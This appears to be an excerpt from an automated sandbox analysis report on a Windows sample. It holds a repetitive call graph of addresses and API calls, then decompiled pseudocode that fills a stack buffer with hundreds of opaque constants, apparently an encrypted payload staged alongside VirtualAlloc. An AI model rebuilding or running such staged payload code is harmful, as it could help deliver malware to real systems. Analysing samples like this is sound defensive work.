7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 call 7fef7521628 call 7fef7521848 call 7fef75214d0 2->295 1295 7fef752546d-7fef752547f CoLoadLibrary 295->1295 1296 7fef7525485-7fef75254c0 LoadStringW * 2 call 7fef7521444 call 7fef75210f4 1295->1296 1297 7fef752552c-7fef752555f VirtualAlloc RtlAllocateHeap 1295->1297 1308 7fef75254c5-7fef75254c7 1296->1308 1299 7fef7525561-7fef7525569 call 7fef7528d20 1297->1299 1300 7fef7525577-7fef75255ca call 7fef7528d20 1297->1300 1305 7fef752556e-7fef7525571 CoTaskMemFree 1299->1305 1307 7fef75255cd-7fef75255de RtlAllocateHeap 1300->1307 1305->1300 1309 7fef75255e0-7fef75255eb call 7fef7528d20 1307->1309 1310 7fef75255f9-7fef752562d 1307->1310 1308->4 1311 7fef75254cd-7fef75254dc LoadAcceleratorsW 1308->1311 1315 7fef75255f0-7fef75255f3 CoTaskMemFree 1309->1315 1310->1307 1313 7fef752562f 1310->1313 1314 7fef752550b-7fef7525520 GetMessageW 1311->1314 1313->1 1316 7fef75254de-7fef75254f3 TranslateAcceleratorW 1314->1316 1317 7fef7525522-7fef7525525 ExitProcess 1314->1317 1315->1310 1316->1314 1318 7fef75254f5-7fef7525505 TranslateMessage DispatchMessageW 1316->1318 1318->1314
                                                                                        C-Code - Quality: 50%
                                                                                        			E000007FE7FEF7521964() {
                                                                                        				void* _t1421;
                                                                                        				void* _t1645;
                                                                                        				void* _t1650;
                                                                                        				signed long long _t1651;
                                                                                        				signed long long _t1652;
                                                                                        				long long _t1653;
                                                                                        				void* _t1870;
                                                                                        				void* _t2526;
                                                                                        				long long _t2744;
                                                                                        				long long _t2746;
                                                                                        				void* _t2748;
                                                                                        				intOrPtr* _t2749;
                                                                                        				void* _t2750;
                                                                                        				signed long long _t2751;
                                                                                        				void* _t2755;
                                                                                        				void* _t2756;
                                                                                        				void* _t2757;
                                                                                        				void* _t2758;
                                                                                        
                                                                                        				_t1650 = _t2750;
                                                                                        				 *((long long*)(_t1650 + 0x10)) = _t1653;
                                                                                        				 *((long long*)(_t1650 + 0x18)) = _t2746;
                                                                                        				 *((long long*)(_t1650 + 0x20)) = _t2744;
                                                                                        				_t2749 = _t1650 - 0xb48;
                                                                                        				_t2751 = _t2750 - 0xc20;
                                                                                        				_t1651 =  *0xf7540610; // 0x6ebcbb99ef5b
                                                                                        				_t1652 = _t1651 ^ _t2751;
                                                                                        				 *(_t2749 + 0xb10) = _t1652;
                                                                                        				_t2745 = _t1870;
                                                                                        				if (_t1645 != 0) goto 0xf7525639;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x50)) = 0x650efe0a;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x54)) = 0x1360335d;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x58)) = 0x7639130e;
                                                                                        				r15d = 0;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x5c)) = 0x72000339;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x60)) = 0xfdb86107;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x64)) = 0xbd887a24;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x68)) = 0xdfe71dbe;
                                                                                        				r13d = _t2526 + 0x6d;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x6c)) = 0x6d52588d;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x70)) = 0x1385ac04;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x74)) = 0x50293b3b;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x78)) = 0x9ec94c51;
                                                                                        				 *((intOrPtr*)(_t2751 + 0x7c)) = 0x2410c80a;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x80)) = 0x17d08c00;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x7c)) = 0xfe57f27;
                                                                                        				r14d = _t2526 + 0x64;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x78)) = 0x64d97b7e;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x74)) = 0xf891935;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x70)) = 0x14cc064f;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x6c)) = 0x14cc7b03;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x68)) = 0x21be252a;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x64)) = 0x1dba1e72;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x60)) = 0x8dd87d09;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x5c)) = 0x414277c2;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x58)) = 0x157eef1d;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x54)) = 0x6f20db11;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x50)) = 0x531bcb24;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x4c)) = 0x3978a018;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x48)) = 0x323acb48;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x44)) = 0x732bdc27;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x40)) = 0x491ed023;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x3c)) = 0xca51d517;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x38)) = 0xbd6ded8c;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x34)) = 0xff06fc14;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x30)) = 0xef33a307;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x2c)) = 0xdb110b76;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x28)) = 0xcb4e1329;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x24)) = 0x4f7a1712;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x20)) = 0x6c2415bc;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x1c)) = 0x274d07b0;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x18)) = 0x9e455d66;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x14)) = 0x6c527d17;
                                                                                        				 *((intOrPtr*)(_t2749 - 0x10)) = 0x15f4562e;
                                                                                        				 *((intOrPtr*)(_t2749 - 0xc)) = 0x3251063d;
                                                                                        				 *((intOrPtr*)(_t2749 - 8)) = 0x5907b042;
                                                                                        				 *((intOrPtr*)(_t2749 - 4)) = 0x4557667b;
                                                                                        				 *_t2749 = 0x5b71179e;
                                                                                        				 *((intOrPtr*)(_t2749 + 4)) = 0xf4562e6c;
                                                                                        				 *((intOrPtr*)(_t2749 + 8)) = 0x513401d5;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xc)) = 0x271b1100;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x10)) = 0x1fe39324;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x14)) = 0x1d525944;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x18)) = 0x1e6628f0;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1c)) = 0x51483f7f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x20)) = 0x3b664496;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x24)) = 0x1437280e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x28)) = 0x27d01f4;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2c)) = 0x315450c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x30)) = 0x11747791;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x34)) = 0x36723863;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x38)) = 0x696506b0;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x3c)) = 0x18295213;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x40)) = 0x2c132995;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x44)) = 0x335c3a2e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x48)) = 0x56d970ee;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x4c)) = 0x8636052b;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x50)) = 0x2446ea10;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x54)) = 0x72aa0235;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x58)) = 0x473930fc;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x5c)) = 0x14f24f35;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x60)) = 0x85032194;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x64)) = 0x5f20bd04;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x68)) = 0x28952a30;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x6c)) = 0x380b04db;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x70)) = 0xc56c9740;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x74)) = 0x14377225;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x78)) = 0x12a10485;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x7c)) = 0x95372a5a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x80)) = 0x232fcf28;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x84)) = 0x6c975b35;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x88)) = 0x3665168d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x8c)) = 0xe9048539;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x90)) = 0x2f2c4707;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x94)) = 0x9f72895;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x98)) = 0x97402f11;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x9c)) = 0x6525f16c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xa0)) = 0x86243e2f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xa4)) = 0x235dae10;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xa8)) = 0x58a7179f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xac)) = 0x618607ab;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xb0)) = 0x96744524;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xb4)) = 0x26139645;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xb8)) = 0x76a12007;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xbc)) = 0x1931379d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xc0)) = 0x8a07ab5e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xc4)) = 0x547d3e5c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xc8)) = 0x9707c737;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xcc)) = 0x43bd2d20;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xd0)) = 0xeb59453a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xd4)) = 0x1cb576d8;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xd8)) = 0xc188b81e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xdc)) = 0x4200582d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xe0)) = 0x92a1c93b;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xe4)) = 0x595d7323;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xe8)) = 0xe17f6d4a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xec)) = 0x82005e07;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xf0)) = 0x241db865;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xf4)) = 0x4cb3f72;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xf8)) = 0xbe2a1d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0xfc)) = 0xc8a46119;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x100)) = 0x7fdd0abf;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x104)) = 0xdc7d1974;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x108)) = 0xa4f6644;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x10c)) = 0x1b4211c8;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x110)) = 0x6d1fd409;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x114)) = 0x766628f0;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x118)) = 0x3525503f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x11c)) = 0x53168d19;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x120)) = 0xa6660462;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x124)) = 0x1a8dba72;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x128)) = 0x72487be6;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x12c)) = 0xa115be1e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x130)) = 0xac06270;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x134)) = 0x7d6506fe;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x138)) = 0x6908be2a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x13c)) = 0x4c132995;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x140)) = 0x503d564c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x144)) = 0x2405b861;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x148)) = 0x95bd3662;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x14c)) = 0x617fed1d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x150)) = 0x72e01a69;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x154)) = 0xf3650784;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x158)) = 0x7571a018;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x15c)) = 0xffa0e28;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x160)) = 0x17229279;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x164)) = 0x78524c65;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x168)) = 0x2cf2437;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x16c)) = 0xca687017;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x170)) = 0x3bc94885;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x174)) = 0xeb1d7166;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x178)) = 0x611cfd76;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x17c)) = 0x6e57fad;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x180)) = 0xa41c1b72;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x184)) = 0x6c72978;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x188)) = 0x55526253;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x18c)) = 0xd40d3375;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x190)) = 0x2d174906;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x194)) = 0xdb7b82bd;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x198)) = 0x48611165;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x19c)) = 0x406af2cf;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1a0)) = 0x76766655;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1a4)) = 0x73e41a99;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1a8)) = 0xbe1a6a48;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1ac)) = 0x15f2091d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1b0)) = 0x42726224;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1b4)) = 0xbe2e5544;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1b8)) = 0x2c727d11;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1bc)) = 0xdd0ab8c8;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1c0)) = 0x7d19747f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1c4)) = 0x329245dc;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1c8)) = 0xef1d8171;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1cc)) = 0x1e716177;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1d0)) = 0x42ecbae0;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1d4)) = 0x6d973356;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1d8)) = 0x42137111;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1dc)) = 0xd8094264;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1e0)) = 0x18651732;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1e4)) = 0xe77fb9ad;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1e8)) = 0x1803720e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1ec)) = 0x487571a4;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1f0)) = 0x9824407;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1f4)) = 0x6d1722dc;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1f8)) = 0x1f20df15;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x1fc)) = 0x137206ab;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x200)) = 0x5139295c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x204)) = 0x6623cf48;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x208)) = 0xe7991461;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x20c)) = 0x491ed20d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x210)) = 0x13cf2407;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x214)) = 0xca1a15ab;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x218)) = 0x53068919;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x21c)) = 0xa666046a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x220)) = 0x14c100f4;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x224)) = 0xe085904;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x228)) = 0xee007edb;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x22c)) = 0x2752cd70;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x230)) = 0xd8092d04;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x234)) = 0x9e651732;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x238)) = 0x1e42cd17;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x23c)) = 0x97553321;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x240)) = 0x6916c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x244)) = 0x19663385;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x248)) = 0x21520919;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x24c)) = 0x6b49169e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x250)) = 0x5c25273e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x254)) = 0x31116d97;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x258)) = 0x27143075;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x25c)) = 0x171add05;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x260)) = 0xc5179e21;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x264)) = 0x33380564;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x268)) = 0x5a8515f4;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x26c)) = 0xb0275237;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x270)) = 0x926f107;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x274)) = 0x953f3746;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x278)) = 0x270f8328;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x27c)) = 0x9f2dbb12;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x280)) = 0x2a2415f2;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x284)) = 0x3e222d3b;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x288)) = 0x356177a1;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x28c)) = 0x3440800;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x290)) = 0x20171285;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x294)) = 0x6532475c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x298)) = 0x653eff06;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x29c)) = 0x6177a121;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2a0)) = 0x521f1421;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2a4)) = 0x17128509;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2a8)) = 0x22507b2c;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2ac)) = 0xc232856f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2b0)) = 0x56052734;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2b4)) = 0xe92fd101;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2b8)) = 0x766628f0;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2bc)) = 0x3527503d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2c0)) = 0x3f96ff10;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2c4)) = 0x3e7105cf;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2c8)) = 0x727d01f4;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2cc)) = 0x42613760;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2d0)) = 0xd1cb81e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2d4)) = 0xf8d1d05;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2d8)) = 0x9572072f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2dc)) = 0x7d01ba2e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2e0)) = 0x38ba257a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2e4)) = 0xaf727666;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2e8)) = 0x4cda7dfd;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2ec)) = 0xcc0a4766;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2f0)) = 0x7676ce10;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2f4)) = 0x73e41a99;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2f8)) = 0xbe1a6a48;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x2fc)) = 0x15f2491d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x300)) = 0x42786224;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x304)) = 0xbe2e554e;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x308)) = 0x2c727d11;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x30c)) = 0xdd0ab8c8;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x310)) = 0x7d19747f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x314)) = 0x1f6644dc;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x318)) = 0x2e957207;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x31c)) = 0x7a7d01ba;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x320)) = 0x2a21ba21;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x324)) = 0x9747791;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x328)) = 0x420d5138;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x32c)) = 0x7115cf3f;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x330)) = 0x8dba7246;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x334)) = 0x487be61a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x338)) = 0x14be1e72;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x33c)) = 0x33144d0d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x340)) = 0x5cb3f82;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x344)) = 0xc87f4e71;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x348)) = 0x73aa2214;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x34c)) = 0x335b6248;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x350)) = 0xdc7d295d;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x354)) = 0x3576654;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x358)) = 0x3c2381be;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x35c)) = 0x2c721cf2;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x360)) = 0x4e17db38;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x364)) = 0x3564db7a;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x368)) = 0x3e1255ae;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x36c)) = 0x2e550cc9;
                                                                                        				 *((intOrPtr*)(_t2749 + 0x370)) = 0xd91195b8;
